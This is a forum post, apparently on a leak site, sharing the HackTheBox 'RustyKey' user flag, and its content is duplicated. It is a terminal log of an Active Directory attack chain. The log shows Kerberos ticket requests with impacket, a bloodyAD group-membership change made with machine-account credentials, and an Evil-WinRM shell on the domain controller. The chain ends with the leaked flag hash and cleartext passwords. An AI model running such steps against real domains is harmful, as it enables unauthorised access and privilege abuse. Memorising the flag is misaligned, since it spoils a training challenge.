HTB RustyKey User Flag

By DefaltXploit in HackTheBox

Loading component...

HTB RustyKey User Flag

By DefaltXploit in HackTheBox

You must be signed in to access this leak.Sign in

Loading component...

DefaltXploit
User
- Posts:2
- Topics:1
┌─[Krypt0n]-[DefaltXploit]-[CTF] └──> ~ # impacket-getTGT rustykey.htb/'bb.morgan':'Abc123456@' [+] Using faketime: 2025-08-31 17:08:10 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies Kerberos SessionError: KDC_ERR_ETYPE_NOSUPP(KDC has no support for encryption type)
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # bloodyAD -k --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' remove groupMember 'PROTECTED OBJECTS' 'IT'
[+] Using faketime: 2025-08-31 17:09:03
[-] IT removed from PROTECTED OBJECTS
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # impacket-getTGT rustykey.htb/'bb.morgan':'Abc123456@'
[+] Using faketime: 2025-08-31 17:09:55
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Saving ticket in bb.morgan.ccache
┌─[Krypt0n]-[DefaltXploit]-[CTF] └──> ~ # export KRB5CCNAME=bb.morgan.ccache
┌─[Krypt0n]-[DefaltXploit]-[CTF] └──> ~ # klist Ticket cache: FILE:bb.morgan.ccache Default principal: bb.morgan@RUSTYKEY.HTB
Valid starting Expires Service principal 08/31/25 17:09:58 09/01/25 03:09:58 krbtgt/RUSTYKEY.HTB@RUSTYKEY.HTB renew until 09/01/25 17:09:58
┌─[Krypt0n]-[DefaltXploit]-[CTF] └──> ~ # evil-winrm -i dc.rustykey.htb -u 'bb.morgan' -r rustykey.htb
[+] Using faketime: 2025-08-31 17:11:39
Evil-WinRM shell v3.7
Warning: User is not needed for Kerberos auth. Ticket will be used
Info: Establishing connection to remote endpoint
Evil-WinRM PS C:\Users\bb.morgan\Documents> dir ../Deskto
p
Directory: C:\Users\bb.morgan\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/4/2025 9:15 AM 1976 internal.pdf
-ar--- 8/29/2025 5:01 AM 34 user.txt
Evil-WinRM PS C:\Users\bb.morgan\Documents> more "C:/Users/bb.morgan/Desktop/user.txt"
573aa9c95a8ad9f2444935052b86852f
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # figlet "'I'm DefaltXploit, Adios Sayonara All Hacker'"
_ ___ _ ____ __ _ _ __ __ _ _ _
( )_ _( )_ __ ___ | \ __ / | _ | | |\ \/ /_ | | _ (_) |_
|/ | ||/| '_ ` \ | | | |/ \ |_ / ` | | _|\ /| '_ \| |/ \| | _|
| | | | | | | | | |_| | __/ | (| | | |_ / \| |_) | | (_) | | |_ _
|___| |_| |_| |_| |____/ \___|_| \__,_|_|\__/_/\_\ .__/|_|\___/|_|\__( )
|_| |/
_ _ _ ____
/ \ __| (_) ___ ___ / ___| __ _ _ _ ___ _ __ __ _ _ __ __ _
/ \ / ` | |/ \/ _| \___ \ / ` | | | |/ \| '_ \ / ` | '_/ _` |
/ ___ \ (_| | | (_) \__ \ ___) | (_| | |_| | (_) | | | | (_| | | | (_| |
/_/ \_\__,_|_|\___/|___/ |____/ \__,_|\__, |\___/|_| |_|\__,_|_| \__,_|
|___/
_ _ _ _ _ _ _
/ \ | | | | | | | __ _ ___| | _____ _ __( )
/ \ | | | | || |/ ` |/ _| |/ / \ '_|/
/ ___ \| | | | | (| | (__| < __/ |
/_/ \_\_|_| |_| |_|\__,_|\___|_|\_\___|_|
31.08.2025, 09:16

Loading component...

DefaltXploit
User
- Posts:2
- Topics:1
┌─[Krypt0n]-[DefaltXploit]-[CTF] └──> ~ # impacket-getTGT rustykey.htb/'bb.morgan':'Abc123456@' [+] Using faketime: 2025-08-31 17:08:10 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies Kerberos SessionError: KDC_ERR_ETYPE_NOSUPP(KDC has no support for encryption type)
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # bloodyAD -k --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' remove groupMember 'PROTECTED OBJECTS' 'IT'
[+] Using faketime: 2025-08-31 17:09:03
[-] IT removed from PROTECTED OBJECTS
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # impacket-getTGT rustykey.htb/'bb.morgan':'Abc123456@'
[+] Using faketime: 2025-08-31 17:09:55
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Saving ticket in bb.morgan.ccache
┌─[Krypt0n]-[DefaltXploit]-[CTF] └──> ~ # export KRB5CCNAME=bb.morgan.ccache
┌─[Krypt0n]-[DefaltXploit]-[CTF] └──> ~ # klist Ticket cache: FILE:bb.morgan.ccache Default principal: bb.morgan@RUSTYKEY.HTB
Valid starting Expires Service principal 08/31/25 17:09:58 09/01/25 03:09:58 krbtgt/RUSTYKEY.HTB@RUSTYKEY.HTB renew until 09/01/25 17:09:58
┌─[Krypt0n]-[DefaltXploit]-[CTF] └──> ~ # evil-winrm -i dc.rustykey.htb -u 'bb.morgan' -r rustykey.htb
[+] Using faketime: 2025-08-31 17:11:39
Evil-WinRM shell v3.7
Warning: User is not needed for Kerberos auth. Ticket will be used
Info: Establishing connection to remote endpoint
Evil-WinRM PS C:\Users\bb.morgan\Documents> dir ../Deskto
p
Directory: C:\Users\bb.morgan\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/4/2025 9:15 AM 1976 internal.pdf
-ar--- 8/29/2025 5:01 AM 34 user.txt
Evil-WinRM PS C:\Users\bb.morgan\Documents> more "C:/Users/bb.morgan/Desktop/user.txt"
573aa9c95a8ad9f2444935052b86852f
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # figlet "'I'm DefaltXploit, Adios Sayonara All Hacker'"
_ ___ _ ____ __ _ _ __ __ _ _ _
( )_ _( )_ __ ___ | \ __ / | _ | | |\ \/ /_ | | _ (_) |_
|/ | ||/| '_ ` \ | | | |/ \ |_ / ` | | _|\ /| '_ \| |/ \| | _|
| | | | | | | | | |_| | __/ | (| | | |_ / \| |_) | | (_) | | |_ _
|___| |_| |_| |_| |____/ \___|_| \__,_|_|\__/_/\_\ .__/|_|\___/|_|\__( )
|_| |/
_ _ _ ____
/ \ __| (_) ___ ___ / ___| __ _ _ _ ___ _ __ __ _ _ __ __ _
/ \ / ` | |/ \/ _| \___ \ / ` | | | |/ \| '_ \ / ` | '_/ _` |
/ ___ \ (_| | | (_) \__ \ ___) | (_| | |_| | (_) | | | | (_| | | | (_| |
/_/ \_\__,_|_|\___/|___/ |____/ \__,_|\__, |\___/|_| |_|\__,_|_| \__,_|
|___/
_ _ _ _ _ _ _
/ \ | | | | | | | __ _ ___| | _____ _ __( )
/ \ | | | | || |/ ` |/ _| |/ / \ '_|/
/ ___ \| | | | | (| | (__| < __/ |
/_/ \_\_|_| |_| |_|\__,_|\___|_|\_\___|_|
31.08.2025, 09:16

HTB RustyKey User Flag - BreachStars